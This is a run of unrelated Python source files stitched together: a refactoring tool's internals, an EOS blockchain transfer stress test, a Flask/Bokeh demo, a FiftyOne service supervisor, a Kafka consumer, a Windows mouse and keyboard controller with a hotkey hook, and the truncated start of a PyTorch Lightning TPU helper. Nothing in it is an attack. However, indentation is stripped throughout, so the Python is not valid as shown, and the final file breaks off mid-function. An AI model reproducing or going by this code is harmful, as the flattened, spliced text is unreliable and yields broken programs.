# previous transformation ; skip
continue
if node.fixers_applied and fixer in node.fixers_applied:
# do not apply the same fixer again
continue
results = fixer.match(node)
if results:
new = fixer.transform(node, results)
if new is not None:
node.replace(new)
#new.fixers_applied.append(fixer)
for node in new.post_order():
# do not apply the fixer again to
# this or any subnode
if not node.fixers_applied:
node.fixers_applied = []
node.fixers_applied.append(fixer)
# update the original match set for
# the added code
new_matches = self.BM.run(new.leaves())
for fxr in new_matches:
if not fxr in match_set:
match_set[fxr]=[]
match_set[fxr].extend(new_matches[fxr])
for fixer in chain(self.pre_order, self.post_order):
fixer.finish_tree(tree, name)
return tree.was_changed
def traverse_by(self, fixers, traversal):
"""Traverse an AST, applying a set of fixers to each node.
This is a helper method for refactor_tree().
Args:
fixers: a list of fixer instances.
traversal: a generator that yields AST nodes.
Returns:
None
"""
if not fixers:
return
for node in traversal:
for fixer in fixers[node.type]:
results = fixer.match(node)
if results:
new = fixer.transform(node, results)
if new is not None:
node.replace(new)
node = new
def processed_file(self, new_text, filename, old_text=None, write=False,
encoding=None):
"""
Called when a file has been refactored and there may be changes.
"""
self.files.append(filename)
if old_text is None:
old_text = self._read_python_source(filename)[0]
if old_text is None:
return
equal = old_text == new_text
self.print_output(old_text, new_text, filename, equal)
if equal:
self.log_debug("No changes to %s", filename)
if not self.write_unchanged_files:
return
if write:
self.write_file(new_text, filename, old_text, encoding)
else:
self.log_debug("Not writing changes to %s", filename)
def write_file(self, new_text, filename, old_text, encoding=None):
"""Writes a string to a file.
It first shows a unified diff between the old text and the new text, and
then rewrites the file; the latter is only done if the write option is
set.
"""
try:
fp = io.open(filename, "w", encoding=encoding)
except OSError as err:
self.log_error("Can't create %s: %s", filename, err)
return
with fp:
try:
fp.write(new_text)
except OSError as err:
self.log_error("Can't write %s: %s", filename, err)
self.log_debug("Wrote changes to %s", filename)
self.wrote = True
PS1 = ">>> "
PS2 = "... "
def refactor_docstring(self, input, filename):
"""Refactors a docstring, looking for doctests.
This returns a modified version of the input string. It looks
for doctests, which start with a ">>>" prompt, and may be
continued with "..." prompts, as long as the "..." is indented
the same as the ">>>".
(Unfortunately we can't use the doctest module's parser,
since, like most parsers, it is not geared towards preserving
the original source.)
"""
result = []
block = None
block_lineno = None
indent = None
lineno = 0
for line in input.splitlines(keepends=True):
lineno += 1
if line.lstrip().startswith(self.PS1):
if block is not None:
result.extend(self.refactor_doctest(block, block_lineno,
indent, filename))
block_lineno = lineno
block = [line]
i = line.find(self.PS1)
indent = line[:i]
elif (indent is not None and
(line.startswith(indent + self.PS2) or
line == indent + self.PS2.rstrip() + "\n")):
block.append(line)
else:
if block is not None:
result.extend(self.refactor_doctest(block, block_lineno,
indent, filename))
block = None
indent = None
result.append(line)
if block is not None:
result.extend(self.refactor_doctest(block, block_lineno,
indent, filename))
return "".join(result)
def refactor_doctest(self, block, lineno, indent, filename):
"""Refactors one doctest.
A doctest is given as a block of lines, the first of which starts
with ">>>" (possibly indented), while the remaining lines start
with "..." (identically indented).
"""
try:
tree = self.parse_block(block, lineno, indent)
except Exception as err:
if self.logger.isEnabledFor(logging.DEBUG):
for line in block:
self.log_debug("Source: %s", line.rstrip("\n"))
self.log_error("Can't parse docstring in %s line %s: %s: %s",
filename, lineno, err.__class__.__name__, err)
return block
if self.refactor_tree(tree, filename):
new = str(tree).splitlines(keepends=True)
# Undo the adjustment of the line numbers in wrap_toks() below.
clipped, new = new[:lineno-1], new[lineno-1:]
assert clipped == ["\n"] * (lineno-1), clipped
if not new[-1].endswith("\n"):
new[-1] += "\n"
block = [indent + self.PS1 + new.pop(0)]
if new:
block += [indent + self.PS2 + line for line in new]
return block
def summarize(self):
if self.wrote:
were = "were"
else:
were = "need to be"
if not self.files:
self.log_message("No files %s modified.", were)
else:
self.log_message("Files that %s modified:", were)
for file in self.files:
self.log_message(file)
if self.fixer_log:
self.log_message("Warnings/messages while refactoring:")
for message in self.fixer_log:
self.log_message(message)
if self.errors:
if len(self.errors) == 1:
self.log_message("There was 1 error:")
else:
self.log_message("There were %d errors:", len(self.errors))
for msg, args, kwds in self.errors:
self.log_message(msg, *args, **kwds)
def parse_block(self, block, lineno, indent):
"""Parses a block into a tree.
This is necessary to get correct line number / offset information
in the parser diagnostics and embedded into the parse tree.
"""
tree = self.driver.parse_tokens(self.wrap_toks(block, lineno, indent))
tree.future_features = frozenset()
return tree
def wrap_toks(self, block, lineno, indent):
"""Wraps a tokenize stream to systematically modify start/end."""
tokens = tokenize.generate_tokens(self.gen_lines(block, indent).__next__)
for type, value, (line0, col0), (line1, col1), line_text in tokens:
line0 += lineno - 1
line1 += lineno - 1
# Don't bother updating the columns; this is too complicated
# since line_text would also have to be updated and it would
# still break for tokens spanning lines. Let the user guess
# that the column numbers for doctests are relative to the
# end of the prompt string (PS1 or PS2).
yield type, value, (line0, col0), (line1, col1), line_text
def gen_lines(self, block, indent):
"""Generates lines as expected by tokenize from a list of lines.
This strips the first len(indent + self.PS1) characters off each line.
"""
prefix1 = indent + self.PS1
prefix2 = indent + self.PS2
prefix = prefix1
for line in block:
if line.startswith(prefix):
yield line[len(prefix):]
elif line == prefix.rstrip() + "\n":
yield "\n"
else:
raise AssertionError("line=%r, prefix=%r" % (line, prefix))
prefix = prefix2
while True:
yield ""
class MultiprocessingUnsupported(Exception):
pass
class MultiprocessRefactoringTool(RefactoringTool):
def __init__(self, *args, **kwargs):
super(MultiprocessRefactoringTool, self).__init__(*args, **kwargs)
self.queue = None
self.output_lock = None
def refactor(self, items, write=False, doctests_only=False,
num_processes=1):
if num_processes == 1:
return super(MultiprocessRefactoringTool, self).refactor(
items, write, doctests_only)
try:
import multiprocessing
except ImportError:
raise MultiprocessingUnsupported
if self.queue is not None:
raise RuntimeError("already doing multiple processes")
self.queue = multiprocessing.JoinableQueue()
self.output_lock = multiprocessing.Lock()
processes = [multiprocessing.Process(target=self._child)
for i in range(num_processes)]
try:
for p in processes:
p.start()
super(MultiprocessRefactoringTool, self).refactor(items, write,
doctests_only)
finally:
self.queue.join()
for i in range(num_processes):
self.queue.put(None)
for p in processes:
if p.is_alive():
p.join()
self.queue = None
def _child(self):
task = self.queue.get()
while task is not None:
args, kwargs = task
try:
super(MultiprocessRefactoringTool, self).refactor_file(
*args, **kwargs)
finally:
self.queue.task_done()
task = self.queue.get()
def refactor_file(self, *args, **kwargs):
if self.queue is not None:
self.queue.put((args, kwargs))
else:
return super(MultiprocessRefactoringTool, self).refactor_file(
*args, **kwargs)
|
p2p_stress.py
|
import copy
import random
import threading
import time
from core_symbol import CORE_SYMBOL
class StressNetwork:
speeds = [1, 5, 10, 30, 60, 100, 500]
sec = 10
maxthreads = 100
trList = []
def maxIndex(self):
return len(self.speeds)
def randAcctName(self):
s = ""
for i in range(12):
s = s + random.choice("abcdefghijklmnopqrstuvwxyz12345")
return s
def _transfer(self, node, acc1, acc2, amount, threadId, round):
memo = "%d %d" % (threadId, round)
tr = node.transferFunds(acc1, acc2, amount, memo)
self.trList.append(tr)
def execute(self, cmdInd, node, ta, eosio):
print("\n==== network stress test: %d transaction(s)/s for %d secs ====" % (self.speeds[cmdInd], self.sec))
total = self.speeds[cmdInd] * self.sec
ta.name = self.randAcctName()
acc1 = copy.copy(ta)
print("creating new account %s" % (ta.name))
tr = node.createAccount(ta, eosio, stakedDeposit=0, waitForTransBlock=True, exitOnError=True)
trid = node.getTransId(tr)
if trid is None:
return ([], "", 0.0, "failed to create account")
print("transaction id %s" % (trid))
ta.name = self.randAcctName()
acc2 = copy.copy(ta)
print("creating new account %s" % (ta.name))
tr = node.createAccount(ta, eosio, stakedDeposit=0, waitForTransBlock=True, exitOnError=True)
trid = node.getTransId(tr)
if trid is None:
return ([], "", 0.0, "failed to create account")
print("transaction id %s" % (trid))
print("issue currency0000 into %s" % (acc1.name))
contract = "eosio"
action = "issue"
data = "{\"to\":\"" + acc1.name + "\",\"quantity\":\"1000000.0000 " + CORE_SYMBOL + "\"}"
opts = "--permission eosio@active"
tr = node.pushMessage(contract, action, data, opts)
trid = node.getTransId(tr[1])
if trid is None:
return ([], "", 0.0, "failed to issue currency0000")
print("transaction id %s" % (trid))
node.waitForTransInBlock(trid)
self.trList = []
expBal = 0
nthreads = self.maxthreads
if nthreads > self.speeds[cmdInd]:
nthreads = self.speeds[cmdInd]
cycle = int(total / nthreads)
total = cycle * nthreads # rounding
delay = 1.0 / self.speeds[cmdInd] * nthreads
print("start currency0000 trasfer from %s to %s for %d times with %d threads" % (
acc1.name, acc2.name, total, nthreads))
t00 = time.time()
for k in range(cycle):
t0 = time.time()
amount = 1
threadList = []
for m in range(nthreads):
th = threading.Thread(target=self._transfer, args=(node, acc1, acc2, amount, m, k))
th.start()
threadList.append(th)
for th in threadList:
th.join()
expBal = expBal + amount * nthreads
t1 = time.time()
if (t1 - t0 < delay):
time.sleep(delay - (t1 - t0))
t11 = time.time()
print("time used = %lf" % (t11 - t00))
actBal = node.getAccountBalance(acc2.name)
print("account %s: expect Balance:%d, actual Balance %d" % (acc2.name, expBal, actBal))
transIdlist = []
for tr in self.trList:
trid = node.getTransId(tr)
transIdlist.append(trid)
node.waitForTransInBlock(trid)
return (transIdlist, acc2.name, expBal, "")
def on_exit(self):
print("end of network stress tests")
|
flask_bokeh.py
|
# Copyright (C) 21/1/20 RW Bunney
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
from flask import Flask, render_template
from bokeh.embed import server_document
from bokeh.layouts import column
from bokeh.models import ColumnDataSource, Slider
from bokeh.plotting import figure
from bokeh.server.server import Server
from bokeh.themes import Theme
from tornado.ioloop import IOLoop
from bokeh.sampledata.sea_surface_temperature import sea_surface_temperature
app = Flask(__name__)
def bkapp(doc):
df = sea_surface_temperature.copy()
source = ColumnDataSource(data=df)
plot = figure(x_axis_type='datetime', y_range=(0, 25), y_axis_label='Temperature (Celsius)',
title="Sea Surface Temperature at 43.18, -70.43")
plot.line('time', 'temperature', source=source)
def callback(attr, old, new):
if new == 0:
data = df
else:
data = df.rolling('{0}D'.format(new)).mean()
source.data = ColumnDataSource(data=data).data
slider = Slider(start=0, end=30, value=0, step=1, title="Smoothing by N Days")
slider.on_change('value', callback)
doc.add_root(column(slider, plot))
# doc.theme = Theme(filename="theme.yaml")
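# The route below embeds the Bokeh app: server_document() returns a <script>
# tag that loads the app from the Bokeh server at /bkapp, and the embed.html
# template is assumed to render that `script` variable unescaped
# (e.g. {{ script|safe }}).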
@app.route('/', methods=['GET'])
def bkapp_page():
    script = server_document('http://localhost:5006/bkapp')
return render_template("embed.html", script=script, template="Flask")
def bk_worker():
# Can't pass num_procs > 1 in this configuration. If you need to run multiple
# processes, see e.g. flask_gunicorn_embed.py
    # the embedding page is served by Flask on port 8000, so that is the origin to allow
    server = Server({'/bkapp': bkapp}, io_loop=IOLoop(), allow_websocket_origin=["localhost:8000"])
server.start()
server.io_loop.start()
from threading import Thread
Thread(target=bk_worker).start()
if __name__ == '__main__':
print('Opening single process Flask app with embedded Bokeh application on http://localhost:8000/')
print()
print('Multiple connections may block the Bokeh app in this configuration!')
print('See "flask_gunicorn_embed.py" for one way to run multi-process')
app.run(port=8000)
|
main.py
|
"""
This script provides a consistent environment for services to run in. The basic
architecture is:
- parent process (python, ipython, etc.)
- this process, referred to as the "current" process (service/main.py)
- child process (the service)
- (optional): any child processes that the service creates
- clients (any other Python processes that are using this service) - see below
Some services that we spin up do not terminate on their own when their parent
process terminates, so they need to be killed explicitly. However, if the
parent process is a Python interpreter that is in the process of shutting down,
it cannot reliably kill its children. This script works around these issues by
detecting when the parent process exits, terminating its children, and only
then exiting itself.
Some services can also only have a single running instance per user. Notably,
only one instance of MongoDB can use a given data folder. To support this, when
invoked with the "--multi" option, this script allows additional "clients", i.e.
other Python processes using FiftyOne, to register themselves at any time. This
script will continue running in the background and keep the child process alive
until all registered clients, including the original parent process, have
exited.
| Copyright 2017-2021, Voxel51, Inc.
| `voxel51.com <https://voxel51.com/>`_
|
"""
import argparse
import collections
import enum
import os
import signal
import subprocess
import sys
import threading
import traceback
import psutil
from fiftyone.core.service import Service
from fiftyone.service.ipc import IPCServer
lock = threading.Lock()
# global flag set when either the parent or child has terminated, to trigger
# shutdown of the current process (and children as necessary)
exiting = threading.Event()
class ExitMode(enum.IntEnum):
CHILD = 1
PARENT = 2
# set to indicate whether the child or parent exited first
exit_mode = None
def trigger_exit(mode):
"""Start the shutdown process."""
with lock:
global exit_mode
if exit_mode is None:
exit_mode = ExitMode(mode)
exiting.set()
def start_daemon_thread(target):
thread = threading.Thread(target=target)
thread.daemon = True
thread.start()
return thread
class ChildStreamMonitor(object):
"""Monitor for an output stream (stdout or stderr) of a child process.
This class serves multiple purposes:
- Collects output from the child process in a rolling buffer in the
background, and makes it available in a thread-safe manner.
- Causes the current process to exit when the child process closes the
stream (i.e. when the child process exits).
"""
def __init__(self, stream):
self.stream = stream
self.output_deque = collections.deque(maxlen=4)
thread = threading.Thread(target=self._run_monitor_thread)
thread.start()
def _run_monitor_thread(self):
"""Background task to collect output from the child process.
This is primarily necessary to keep the child process from hanging,
which would occur if it produces too much output that the current
process doesn't read, but the collected output is also made available
for convenience.
"""
while True:
chunk = self.stream.read(1024)
if not chunk:
# EOF - subprocess has exited, so trigger shutdown
trigger_exit(ExitMode.CHILD)
break
self.output_deque.appendleft(chunk)
def to_bytes(self):
"""Return output recently collected from the child process.
Currently, this is limited to the most recent 4KB.
"""
return b"".join(self.output_deque)
class ClientMonitor(object):
"""Monitor to keep track of all clients using this service.
This is only used for services that use multiple clients, e.g. the database
service. In addition to tracking the original parent process, other
processes can also request to be tracked by sending a message to this
process as a tuple: ("register", PID). trigger_exit(PARENT) is only called
after the original parent and all registered clients have shut down.
"""
# sentinel used to represent the original parent (which is tracked without
# its PID)
_PARENT = "parent"
def __init__(self):
"""Creates and starts a client monitor."""
# This has an internal lock, so it is reused for any operations that
# need to be synchronized
self.cond = threading.Condition()
# A set of clients (psutil.Process objects, which are hashable).
# As long as monitor_stdin() hasn't been called yet, we can assume the
# parent is still alive, and this can be changed later
self.clients = {ClientMonitor._PARENT}
# start background tasks
self.thread = start_daemon_thread(target=self._background_loop)
self.server = IPCServer.run_in_background(
on_message=self._handle_message
)
def notify_parent_exit(self):
"""Notifies the monitor that the original parent process has exited."""
self._notify_exit(ClientMonitor._PARENT)
def _background_loop(self):
"""Main background loop - waits for all clients to exit, then shuts down
the current process."""
with self.cond:
while self.clients:
self.cond.wait()
# all clients have exited now, so shut down
trigger_exit(ExitMode.PARENT)
def _background_wait(self, process):
try:
process.wait()
except psutil.Error:
pass
finally:
self._notify_exit(process)
def _notify_exit(self, process):
"""Notifies _background_loop that a client has exited."""
with self.cond:
self.clients.remove(process)
self.cond.notify_all()
def _handle_message(self, message):
"""Handles an incoming IPC message.
This currently supports registering and unregistering clients.
Args:
message (tuple): a 2-item tuple (command: str, argument)
Returns:
response to send to the client (True on success, Exception on failure)
"""
if not isinstance(message, tuple):
raise TypeError("Expected tuple, got " + str(type(message)))
command, arg = message
with lock:
if exiting.is_set():
raise RuntimeError("service is exiting, cannot connect")
if command == "register":
process = psutil.Process(int(arg))
with self.cond:
if process not in self.clients:
self.clients.add(process)
start_daemon_thread(
target=lambda: self._background_wait(process)
)
return True
elif command == "unregister":
process = psutil.Process(int(arg))
self._notify_exit(process)
return True
else:
raise ValueError("Unrecognized command: " + repr(command))
if __name__ != "__main__":
raise RuntimeError(
"This file is for internal use only and cannot be imported"
)
parser = argparse.ArgumentParser()
parser.add_argument(
"--51-service",
dest="service_name",
metavar="SERVICE_NAME",
type=str,
required=True,
)
parser.add_argument("--multi", action="store_true")
args, command = parser.parse_known_args()
if not command:
raise ValueError("No command given")
if command[0].startswith("--"):
raise ValueError("Unhandled service argument: %s" % command[0])
service_class = Service.find_subclass_by_name(args.service_name)
if args.multi:
client_monitor = ClientMonitor()
# ignore signals sent to the parent process - parent process termination is
# handled below, and necessary for cleaning up the child process
if hasattr(os, "setpgrp"):
# UNIX-only: prevent child process from receiving SIGINT/other signals
# from the parent process
os.setpgrp()
# also explicitly ignore SIGINT for good measure (note that this MUST be done
# before spinning up the child process, as the child inherits signal handlers)
signal.signal(signal.SIGINT, signal.SIG_IGN)
popen_kwargs = {}
if sys.platform.startswith("win"):
# CREATE_NEW_PROCESS_GROUP: disable ctrl-c
# https://docs.microsoft.com/en-us/windows/win32/procthread/process-creation-flags?redirectedfrom=MSDN
popen_kwargs["creationflags"] = 0x00000200
# use psutil's wrapper around subprocess.Popen for convenience (e.g. it makes
# finding the child's children significantly easier)
child = psutil.Popen(
command,
stdin=subprocess.DEVNULL,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
**popen_kwargs,
)
child_stdout = ChildStreamMonitor(child.stdout)
child_stderr = ChildStreamMonitor(child.stderr)
def monitor_stdin():
"""Trigger shutdown when the parent process closes this process's stdin.
This should only occur when the parent process has exited.
"""
while len(sys.stdin.read(1024)):
pass
if args.multi:
client_monitor.notify_parent_exit()
else:
trigger_exit(ExitMode.PARENT)
def shutdown():
"""Kill subprocesses and wait for them to finish.
Also dumps output if the main child process fails to exit cleanly.
"""
# attempt to call cleanup() for the running service
try:
service_class.cleanup()
except Exception:
sys.stderr.write("Error in %s.cleanup():\n" % service_class.__name__)
traceback.print_exc(file=sys.stderr)
sys.stderr.flush()
# "yarn dev" doesn't pass SIGTERM to its children - to be safe, kill all
# subprocesses of the child process first
try:
# children() returns parent processes first - start with children
# instead to make killing "yarn dev" more reliable
for subchild in reversed(child.children(recursive=True)):
try:
subchild.terminate()
except psutil.NoSuchProcess:
# we may have already caused it to exit by killing its parent
pass
child.terminate()
except psutil.NoSuchProcess:
# child already exited
pass
child.wait()
if exit_mode == ExitMode.CHILD and child.returncode != 0:
sys.stdout.buffer.write(child_stdout.to_bytes())
sys.stdout.flush()
sys.stderr.write(
"Subprocess %r exited with error %i:\n"
% (command, child.returncode)
)
sys.stderr.buffer.write(child_stderr.to_bytes())
sys.stderr.flush()
stdin_thread = start_daemon_thread(target=monitor_stdin)
exiting.wait()
shutdown()
|
event_stream_consumer.py
|
import json
import logging
import os
from .event_stream_base import EventStreamBase
from kafka import KafkaConsumer, KafkaProducer
from kafka.vendor import six
from multiprocessing import Process, Queue, current_process, freeze_support, Pool
# Design notes:
# - import an event-stream reader and inherit from it; subclasses override the
#   per-message method (topic passed as a string?) -> that is the goal of the
#   event-stream abstraction.
#
# Option 1: this is just a function; everything else (multiple threads, etc.)
#           is handled elsewhere.
# Option 2: this is a class that you can run however you wish.
# Option 3 (1+2): the event-stream class itself provides helpers to run the
#                 class across multiple threads.
#
# Roles: consumer, producer, consumer+producer.
#
# Open question (the event-stream problem): should one instance handle multiple
# streams or just one each? e.g. an event-stream processor running producer1,
# consumer2, ...
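# A minimal usage sketch (hypothetical subclass; the constructor argument mirrors
# the __main__ example at the bottom of this file, and the Kafka settings come
# from EventStreamBase):
#
#   class LinkEventConsumer(EventStreamConsumer):
#       relation_type = "discusses"
#       def on_message(self, json_msg):
#           logging.warning("handling event: %s" % json_msg)
#
#   LinkEventConsumer(1).consume()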
class EventStreamConsumer(EventStreamBase):
relation_type = ''
state = "raw"
topics = False
consumer = False
task_queue = Queue()
process_number = 4
log = "EventStreamConsumer " + str(id) + " "
def create_consumer(self):
logging.warning(self.log + "rt: %s" % self.relation_type)
if self.state == 'all':
self.topics = self.build_topic_list()
if isinstance(self.state, six.string_types):
self.state = [self.state]
if isinstance(self.relation_type, six.string_types):
self.relation_type = [self.relation_type]
if not self.topics:
self.topics = list()
for state in self.state:
for relation_type in self.relation_type:
self.topics.append(self.get_topic_name(state=state, relation_type=relation_type))
# self.topic_name = 'tweets'
logging.warning(self.log + "get consumer for topic: %s" % self.topics)
# consumer.topics()
self.consumer = KafkaConsumer(group_id=self.group_id,
bootstrap_servers=self.bootstrap_servers, api_version=self.api_version,
consumer_timeout_ms=self.consumer_timeout_ms)
for topic in self.topics:
self.consumer.subscribe(topic)
def consume(self):
logging.warning(self.log + "consume")
self.running = True
if not self.consumer:
self.create_consumer()
# Start worker processes
# for i in range(self.process_number):
# Process(target=self.on_message, args=(self.task_queue, )).start()
pool = Pool(self.process_number, self.worker, (self.task_queue,))
while self.running:
try:
for msg in self.consumer:
logging.warning(self.log + 'msg in consumer ')
# logging.warning('msg in consumer %s' % msg.value)
self.task_queue.put(json.loads(msg.value.decode('utf-8')))
except Exception as exc:
self.consumer.close()
logging.error(self.log + 'stream Consumer generated an exception: %s' % exc)
logging.warning(self.log + "Consumer closed")
break
if self.running:
return self.consume()
pool.close()
logging.warning(self.log + "Consumer shutdown")
def worker(self, queue):
logging.debug(self.log + "working %s" % os.getpid())
while True:
item = queue.get(True)
logging.debug(self.log + "got %s item" % os.getpid())
self.on_message(item)
def on_message(self, json_msg):
logging.warning(self.log + "on message")
def stop(self):
self.running = False
logging.warning(self.log + 'stop running consumer')
if __name__ == '__main__':
e = EventStreamConsumer(1)
e.consume()
|
BaseCtrl.py
|
from host.BaseComm import BaseComm
import os
import time
import pyautogui as pag
from ctypes import *
from win32api import GetSystemMetrics
from host.codemap import VirtualKeyCode
# https://www.lfd.uci.edu/~gohlke/pythonlibs/#pyhook
import pyHook
import pythoncom
import threading
import time
dll = WinDLL("C:\\Windows\\System32\\user32.dll")
# x, y = pag.position()  # returns the current mouse coordinates
# MC (Minecraft) mouse control approach: snap the cursor back to center quickly
# # initialize the screen size (mouse-based method...)
# _x , _y = pag.position()
# dll.mouse_event(0x0001 | 0x8000, 65536, 65536, 0, 0)
# time.sleep(0.01)
# display = pag.position()
# display = list(map(lambda x: x+1, display))
# print('screen size', display)
# # pag.position(_x, _y)
# dll.mouse_event(0x0001 | 0x8000, int(65536 * _x / display[0]), int(65536 * _y / display[0]), 0, 0)
display = [GetSystemMetrics(0), GetSystemMetrics(1)]
print('screen size', display)
# carry a fractional remainder as a correction (?)
fix = [0.0, 0.0]
class BaseCtrl:
    MOUSEEVENTF_MOVE = 0x0001  # move the mouse
    MOUSEEVENTF_LEFTDOWN = 0x0002  # simulate left button down
    MOUSEEVENTF_LEFTUP = 0x0004  # simulate left button up
    MOUSEEVENTF_RIGHTDOWN = 0x0008  # simulate right button down
    MOUSEEVENTF_RIGHTUP = 0x0010  # simulate right button up
    MOUSEEVENTF_MIDDLEDOWN = 0x0020  # simulate middle button down
    MOUSEEVENTF_MIDDLEUP = 0x0040  # simulate middle button up
    MOUSEEVENTF_ABSOLUTE = 0x8000  # flag: use absolute coordinates
    MOUSEEVENTF_WHEEL = 0x0800  # mouse wheel
    WHEEL_DELTA = 120  # one wheel notch
    KEYEVENTF_KEYUP = 0x0002  # key up
    KEYEVENTF_EXTENDEDKEY = 0x0001  # single key press
ACTION_NONE = 0
ACTION_W = 1
ACTION_S = 2
ACTION_A = 3
ACTION_D = 4
ACTION_E = 5
ACTION_UP = 6
ACTION_DOWN = 7
def __init__(self):
pass
@staticmethod
    # incoming data: length 4, [x, y, key1, key2]
def parse(data: list):
if len(data) != 4:
return
@staticmethod
def move(x, y):
global fix
        # use relative positioning
        # range: [1, 1, screen width - 1, screen height - 1]
# x = int(x * 65535 / display[0])
# y = int(y * 65535 / display[1])
ix, iy = int(x), int(y)
fix[0] = fix[0] + (x - ix)
fix[1] = fix[1] + (y - iy)
        # the fractional correction was to be dropped for now... it is a bit buggy
if fix[0] >= 1:
fix[0] -= 1
# print('FIX X+1')
ix += 1
if fix[0] <= -1:
fix[0] += 1
ix -= 1
# print('FIX X-1')
if fix[1] >= 1:
fix[1] -= 1
iy += 1
# print('FIX Y+1')
if fix[1] <= -1:
fix[1] += 1
iy -= 1
# print('FIX Y-1')
        # apply an adjustment curve: x^3
ix = ix**3
iy = iy**3
ix = int(ix * 65536 / 3500 / 3500 / display[0])
iy = int(iy * 65536 / 3500 / 3500 / display[1])
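        # Sensitivity curve: cubing ix/iy above makes small inputs move the cursor
        # only slightly while large inputs accelerate; the constants (65536, 3500,
        # screen size) then rescale the cubed value back into a small relative
        # delta for mouse_event. The 3500 divisor appears to be the expected
        # maximum input magnitude (an assumption, not documented in the source).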
# print('move:', x, y , '->', ix, iy)
# print('fix:', fix)
# dll.mouse_event(BaseCtrl.MOUSEEVENTF_ABSOLUTE | BaseCtrl.MOUSEEVENTF_MOVE, x, y, 0, 0)
dll.mouse_event(BaseCtrl.MOUSEEVENTF_MOVE, ix, iy, 0, 0)
@staticmethod
def left_down():
dll.mouse_event(BaseCtrl.MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0)
@staticmethod
def left_up():
dll.mouse_event(BaseCtrl.MOUSEEVENTF_LEFTUP, 0, 0, 0, 0)
@staticmethod
def right_down():
dll.mouse_event(BaseCtrl.MOUSEEVENTF_RIGHTDOWN, 0, 0, 0, 0)
@staticmethod
def right_up():
dll.mouse_event(BaseCtrl.MOUSEEVENTF_RIGHTUP, 0, 0, 0, 0)
@staticmethod
def wheel_up():
dll.mouse_event(BaseCtrl.MOUSEEVENTF_WHEEL, 0, 0, BaseCtrl.WHEEL_DELTA, 0)
@staticmethod
def wheel_down():
        # bitwise NOT to express a negative scroll amount
dll.mouse_event(BaseCtrl.MOUSEEVENTF_WHEEL, 0, 0, ~BaseCtrl.WHEEL_DELTA, 0)
@staticmethod
def kbd_down(code: int):
dll.keybd_event(int(code), 0, 0, 0)
@staticmethod
def kbd_up(code: int):
dll.keybd_event(code, 0, BaseCtrl.KEYEVENTF_KEYUP, 0)
@staticmethod
def kbd_click(code: int):
dll.keybd_event(code, 0, BaseCtrl.KEYEVENTF_EXTENDEDKEY, 0)
# dll.keybd_event(int(code), 0, 0, 0)
# time.sleep(0.01)
# dll.keybd_event(code, 0, BaseCtrl.KEYEVENTF_KEYUP, 0)
@staticmethod
def action_forward_down():
BaseCtrl.kbd_down(VirtualKeyCode.W_key)
@staticmethod
def action_forward_up():
BaseCtrl.kbd_up(VirtualKeyCode.W_key)
@staticmethod
def action_backward_down():
BaseCtrl.kbd_down(VirtualKeyCode.S_key)
@staticmethod
def action_backward_up():
BaseCtrl.kbd_up(VirtualKeyCode.S_key)
    # NOTE: every directional action below was originally bound to S_key, which
    # looks like a copy-paste slip. Left/right are corrected to A_key/D_key on
    # the assumption that host.codemap.VirtualKeyCode follows the same naming
    # pattern as W_key/S_key/E_key; the up/down actions are left on S_key
    # because the intended keys are not clear from the source.
    @staticmethod
    def action_left_down():
        BaseCtrl.kbd_down(VirtualKeyCode.A_key)
    @staticmethod
    def action_left_up():
        BaseCtrl.kbd_up(VirtualKeyCode.A_key)
    @staticmethod
    def action_right_down():
        BaseCtrl.kbd_down(VirtualKeyCode.D_key)
    @staticmethod
    def action_right_up():
        BaseCtrl.kbd_up(VirtualKeyCode.D_key)
    @staticmethod
    def action_up_down():
        BaseCtrl.kbd_down(VirtualKeyCode.S_key)
    @staticmethod
    def action_up_up():
        BaseCtrl.kbd_up(VirtualKeyCode.S_key)
    @staticmethod
    def action_down_down():
        BaseCtrl.kbd_down(VirtualKeyCode.S_key)
    @staticmethod
    def action_down_up():
        BaseCtrl.kbd_up(VirtualKeyCode.S_key)
@staticmethod
def item_bar():
BaseCtrl.kbd_click(VirtualKeyCode.E_key)
@staticmethod
def hot_key(function):
class KeyboardMgr:
m_bZeroKeyPressed = False
m_bShiftKeyPressed = False
def on_key_pressed(self, event):
if str(event.Key) == 'Lshift' or str(event.Key) == 'Rshift' and self.m_bZeroKeyPressed != True:
self.m_bShiftKeyPressed = True
if event.Alt == 32 and str(event.Key) == 'Z' and self.m_bShiftKeyPressed == True:
function()
return True
def on_key_up(self, event):
if str(event.Key) == 'Lshift' or str(event.Key) == 'Rshift':
self.m_bShiftKeyPressed = False
elif str(event.Key) == 'Z':
self.m_bZeroKeyPressed = False
return True
keyMgr = KeyboardMgr()
hookMgr = pyHook.HookManager()
hookMgr.KeyDown = keyMgr.on_key_pressed
hookMgr.KeyUp = keyMgr.on_key_up
hookMgr.HookKeyboard()
pythoncom.PumpMessages()
@staticmethod
# Handler set-up for when the hotkey is pressed
def when_hot_key(function):
t = threading.Thread(target=BaseCtrl.hot_key, args=(function, ))
t.daemon = True
t.start()
if __name__ == '__main__':
# BaseCtrl.when_hot_key(lambda: print('HOT'))
# time.sleep(10)
BaseCtrl.move(65536 // 10, 65536 // 10)
|
xla_device.py
|
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
import os
import queue as q
import traceback
from multiprocessing import Process, Queue
from pytorch_lightning.utilities.imports import _XLA_AVAILABLE
if _XLA_AVAILABLE:
import torch_xla.core.xla_model as xm
# define TPU availability timeout in seconds
TPU_CHECK_TIMEOUT = 60
def inner_f(queue, func, *args, **kwargs): # pragma: no cover
try:
queue.put(func(*args, **kwargs))
# todo: specify the possible exception
except Exception:
traceback.print_exc()
queue.put(None)
def pl_multi_process(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
queue = Queue()
proc = Process(target=inner_f, args=(queue, func, *args), kwargs=kwargs)
proc.start()
proc.join(TPU_CHECK_TIMEOUT)
try:
